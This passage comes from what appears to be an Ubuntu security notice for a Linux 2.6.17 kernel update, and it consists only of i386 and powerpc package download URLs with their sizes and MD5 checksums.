http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   227606 9841f92234aeb38595f1293b494568e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  1048396 efe5e40a4ae6796607860e5d840a5a47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  1048474 d563de8e4950bc06a27fab7459ad3d13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  2092330 71269925380b7a53f571a792902e40e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  2142966 244c5b370c5702454a45fb98e291b893\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   156878 34e962d29e772315d6a8bec7bd8125a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   152162 207cf979445881979febccef8f8c8f16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     9180 653053c650343a44e34729fe57917e22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     9648 4e38d07f2067367b9ac6e61ddba3cf1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    79222 7388ad369b101a9dae3bd539a754d4c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    81770 29bfefabc36a16493a6c928e5c58da38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    55084 a6c3b4f079a095432b01a305cbae1396\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    56718 03f87fee426b9cc7fc35dc697ac325ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    34482 65bf40cdcfc50d3832c0ff11718f5396\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    35408 d04fc0238dcd62de3fb9e0b696984f21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    85872 2e70dabbc267da94fd563983d00e5107\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    87422 6eab637529e91e42132421a2623ca118\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     6082 4b7dd3a6d7a23d2ac89d8474f92a6539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     6094 203d5f595becc3bb0d957dd549adb75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     8606 76c97fd3e2a3cb7de66fa2c1f5e398c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     8896 0cdf1a91eb6071ea5995d851aecb81b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    52688 ba24acfaeb327bf001d504acc7d5b75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    55122 a6884e5f912d6465674ce54c432bef12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   129974 5daf3e9a11ac11bc33ebfb8995c0c5a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   132968 50c95f3dcf8d14b56fdb82306d94b7c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    99866 102ff3cf54930b07dced990e7c30a70b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   101180 8f60dad4cecf4e8e0f0bf30d2162ffc1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    79570 14fc6f678413e604b19cd3a33822b5a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    80934 7284906fa24651580cb843cee6257cfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  1394988 43c6a6fd2292cf49d985dc7b5084e19e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  1398074 23664d8e6a692cd769334ccb78fb7410\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    69148 867580f768fe09e83f12202b7f7e597c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    71084 eb40bc9dcbf86451aa20c2db96d34f01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    11424 6b8b68d6a549d95ab38c3188ed8e6fc1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    11978 9554a7b0b1f5dfdb947c3344bf25e854\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    62476 ab5f24aab938d7761c8d8f5442b63f5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    63810 d4cbcad8cbc7229d93ea2e7d48d39281\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    36010 94aa7cefcd3dd08d4a0f978267922dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    36522 a72b7b1633c362baf4d0c6083675319e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   127286 a868972d2e67d6ec03b8412fe7dd28ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   131320 f749aa5ebbee0a4abdd9c96cb603ede2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    46806 0a9099db77a10a02a3ec302e7775e0f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    47566 1ac5455bfc93bd8a7092b1b996df28af\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   311918 e7142f360d3687c441d7b3a0d69d25ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   318714 5585932fd8af675a5642ce57cb333c82\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.43_i386.deb\n      Size/MD5: 21484142 e549bbd000f802f1ce6f85fbbc8da78d\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    23238 53fc0644ab2667ebaa63e6555cf5bcd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    26080 61de9f3880cadbed25a77da65a1381b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    48582 20001c8ee3ba761cda24e78a328c7f51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    52026 d2de59960c36717e17eff322c41b6cfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:     2324 6e6aace6fc6ec134c47e66be6e3b8910\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:     2518 b7403b5104c85010417cefe0bb961eba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    39146 eb90a49a38b103a0c3925757005d140a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    43166 4bce12f747cc8597cba308382fa5734c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   111460 e5df7aed7a368842aa08c48eb318d0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   122268 95bcbec23c1ac6925c17c63d8d7ff2f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    40400 5ca5efe90ffda02d3a2f368ac5926e07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    46882 1daf80a83b475fc47e107ea19c2f1c29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    28056 602a8c20ee55224f5e824a94ad516c91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    29048 74bbf1906200f8168c4c10ab3c0a91b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   209726 37949b1bd644df91cb559c5e7c05dfa5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   225678 04e5b59a597dfd8a936511d81d176cc5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    44594 8a341d88e62f15b0e997e55a523a6001\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    40184 23761fd6eb86b0c5a006995cbe8c7441\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:     1960 a81261f05b4413cb805c5cc98dac3e3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:     2232 720abc04eff79cd85153bb8c8df838c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    79290 9f60ae5f87473c3947ea6d2d0de89be0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    86610 033ad75e83281556635eb12f445cf403\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   110264 f0cc25236eeced2feae2e38e09b1681a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   127796 7848b94f46c94863ce29e08fa4ee9a5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    55674 88210cc4fef84f6898a9034e616038f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    61920 4b53ad32944d8ca53b99688e7d763931\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   141120 b4253369f9feda2fc952711ac5fb9a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   158556 7eb554805126a1b4740d763990af12be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   314554 e620f4f0bb79ff6ab0535acfeac6452e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   289944 a8b65ff9e8a4f726faf2f6d14dfe33e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   113206 35c13327d1ea4bdb2e169a8db1315559\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   116440 7adc05cc43e1cd300961f7f5ff52144c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  2052404 264e9cb55abd564b2abe629cfebb5d39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  2771994 df310966d1574da2e33db73462be6b11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:   914794 46708abca31659f634cd987abe4daec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:   921198 729dc495336aa978b082a1ca4962503d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:   913678 99cd38c5af261b0eb4dd11b402235d42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:  7446498 e84f6638a57eddd3d307294456d9f772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb\n      Size/MD5: 22661310 05741c12775bbefffb071dd827ad538c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb\n      Size/MD5: 24547942 a2ef72e91f53b6eb48d19adc6fd9a547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb\n      Size/MD5: 22374876 1dda818de16c588392f35758bfbb2c2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:  2043762 6b4acfa8df86c7c7bb0571256263e9c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:  2590694 9fc0fe11c23987e62b85d020c2cb3b1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:  1970160 a042a3b2fbb7addcd24cf8523909f94c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_powerpc.deb\n      Size/MD5:  1730666 ef87744057ec4e152500a402f032b4fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    17432 8e1670ff2799ee52c41e8a2b30980fd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    17360 30ff65ef2675b3fbaef752960c41c05a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   258074 6a1e8015578acf90231d5fb227e04a3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   297924 2db07e22e507226b483074f6d671e449\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   239034 1723ea1aa2ace718085b2668d6cde21c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   266526 0f741ed7f029223f17b8200002e30072\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  1048454 1f16af9a1e471b4192dd9eea120381d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  1048608 48dd6d4c800e1c72fa4b41436573147f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  2098438 06fad977e90befb9d53d0d94c015a601\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  2331936 950fce471c80ab9b5090d864b3009a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   233852 903f12e48fc5fc52514259609d4b4273\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   214706 64fc235662b4e3a9737617940b685ad6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    12694 9937461669ac75116fa1e86fd9071d23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    13314 d4a5296356835a8bb13c923d37f13835\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    83232 ab2fff0877182b5dcff4f2398b7fa745\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    97172 0872f1074ad34b2d6ed1b8a096d0ba5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    71168 0a7cd564f28048ebddb4a6d5aff40dd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    84204 502d3a406df9a941fec737e64f21bf6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:     6346 4278171c37022964d8c3fd1a9e9062e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:     6882 ada53c4f661823d1aa15d3da5d7381f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    57006 cc9ef5d6774ab1bcdeeeef3e6b604b79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    69212 978fcee1780d896d808af0f33c2b1e62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   128616 2c650682c75e04eada9b408a1bed6933\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   156244 3f5021cf6f2691fcb6cc7a69b5eff0c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   109760 8d1ddc5ab13c23ae60f7325d371a5b5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   133032 3b7ebc26e4b8d2148f42ada445756aca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    86614 6b12c54f143d943ab728cca2966c9900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    94818 3fe1ddae09d238a0de8917af39c469c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  1511562 53c6f5e7d9330476a33c6a7ccbc7e547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:  1521646 4aed4934db6bab23e58acefb717516a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   101304 8a843520dda399460efdbdd6a6b3e985\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   115564 b3828f218cb3aeb0b7901efb2ae719db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    12202 3a395dbccce9671e7f74f9b96e59f8a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    14292 cf01622eb1b2c4444468a5e39bcdf92b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    84666 e37f71ffa64e4ab1a23af78612190967\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    87956 b0bc26f0a72112f40bb8f084f3a189ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    37282 e0be93f6cb6d0945185744e9abbf7ab3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    40256 f16ccfb45a78740d94eeba781ea778f9\n    